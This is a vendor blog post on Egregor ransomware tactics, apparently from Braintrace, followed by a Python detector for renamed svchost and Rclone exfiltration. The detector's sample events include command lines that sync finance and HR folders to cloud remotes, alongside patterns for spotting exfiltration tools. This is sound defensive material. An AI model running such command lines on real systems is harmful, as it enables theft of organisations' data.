Braintrace’s take on the Egregor Ransomware and How to Defend Against it

By John Limb, CTO at Braintrace
Jan 19, 2021 8:02 am ET

The FBI assesses that Egregor ransomware operates under a Ransomware-as-a-Service (RaaS) model, in which several different individuals each play a part in a single intrusion and ransomware event. Because so many actors are involved in deploying Egregor, the tactics, techniques, and procedures (TTPs) seen in its deployment vary widely, which creates significant challenges for defense and mitigation.

As Braintrace reported in its December white paper “The Path to Ransomware,” Egregor resembles most ransomware attacks. Once Egregor affiliates gain access to a network, they use common pen testing and exploit tools such as Cobalt Strike, Qakbot/Qbot, Advanced IP Scanner, and AdFind to escalate privileges and move laterally, and they use tools such as Rclone (sometimes renamed or disguised as svchost) and 7zip to exfiltrate data.
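As an added illustration (not Braintrace's code and not how Dragonfly works), the Python below runs two endpoint checks over constructed process-creation records that correspond to the tradecraft just described: a process named svchost.exe executing outside its normal system directories (Rclone renamed to blend in), and an rclone-style command line pointing at a cloud remote. The record fields, sample events and the list of Rclone verbs are assumptions for the example.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample process-creation events (assumption: fields modelled on a
# generic EDR/Sysmon record; none of this is real telemetry).
EVENTS = [
    {"image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs -p"},
    {"image": r"C:\Users\Public\svchost.exe",
     "cmdline": r"svchost.exe copy C:\Finance backup:exfil --config C:\Users\Public\r.conf -q"},
    {"image": r"C:\ProgramData\7z\7z.exe",
     "cmdline": r"7z.exe a -pSecret archive.7z C:\Finance"},
    {"image": r"C:\Tools\rclone.exe",
     "cmdline": r"rclone.exe sync C:\HR mega:dump"},
]

# Directories where the genuine Windows service host lives.
LEGIT_SVCHOST_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
# Rclone sub-commands typically seen when data is pushed to a remote.
RCLONE_VERBS = {"copy", "sync", "move", "copyto", "lsd", "listremotes"}
# Rclone addresses remotes as "name:path"; two or more characters before the
# colon keeps single-letter drive specs such as C:\ from matching.
REMOTE_ARG = re.compile(r"^[A-Za-z0-9_-]{2,}:")


def analyze(event):
    """Return a list of human-readable findings for one process event."""
    findings = []
    path = PureWindowsPath(event["image"])
    if path.name.lower() == "svchost.exe" and str(path.parent).lower() not in LEGIT_SVCHOST_DIRS:
        findings.append("svchost.exe running outside System32/SysWOW64 (possible renamed tool)")
    args = event["cmdline"].split()[1:]          # drop the executable itself
    has_verb = any(a.lower() in RCLONE_VERBS for a in args)
    has_remote = any(REMOTE_ARG.match(a) and "://" not in a for a in args)
    if has_verb and (has_remote or "--config" in args):
        findings.append("rclone-style command line targeting a cloud remote (exfiltration tooling)")
    return findings


def scan(events):
    """Return (image, findings) for every event that produced at least one finding."""
    return [(e["image"], analyze(e)) for e in events if analyze(e)]


if __name__ == "__main__":
    for image, hits in scan(EVENTS):
        print(image, "->", "; ".join(hits))
```

The archiver invocation is deliberately not flagged on its own: staging with 7zip is only meaningful alongside the other signals, so it is left for correlation rather than a standalone rule.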

The best way to prevent Egregor ransomware attacks is to identify these exploitation tools before they have a chance to cause damage. Braintrace’s Dragonfly NDR product detects the early network traffic associated with these tools and alerts on it. Using proprietary deep learning models, specifically our Encrypted Payload Analytics (EPA) and Domain Generation Algorithm (DGA) detection engines, Dragonfly alerts on early command and control (C2) communications. That alert triggers expanded detection and response (XDR) capabilities, which engage endpoint applications to quarantine or clean the device before the intrusion can move further laterally through the network.

To learn more about Braintrace’s complete XDR or NDR solutions, please send a request to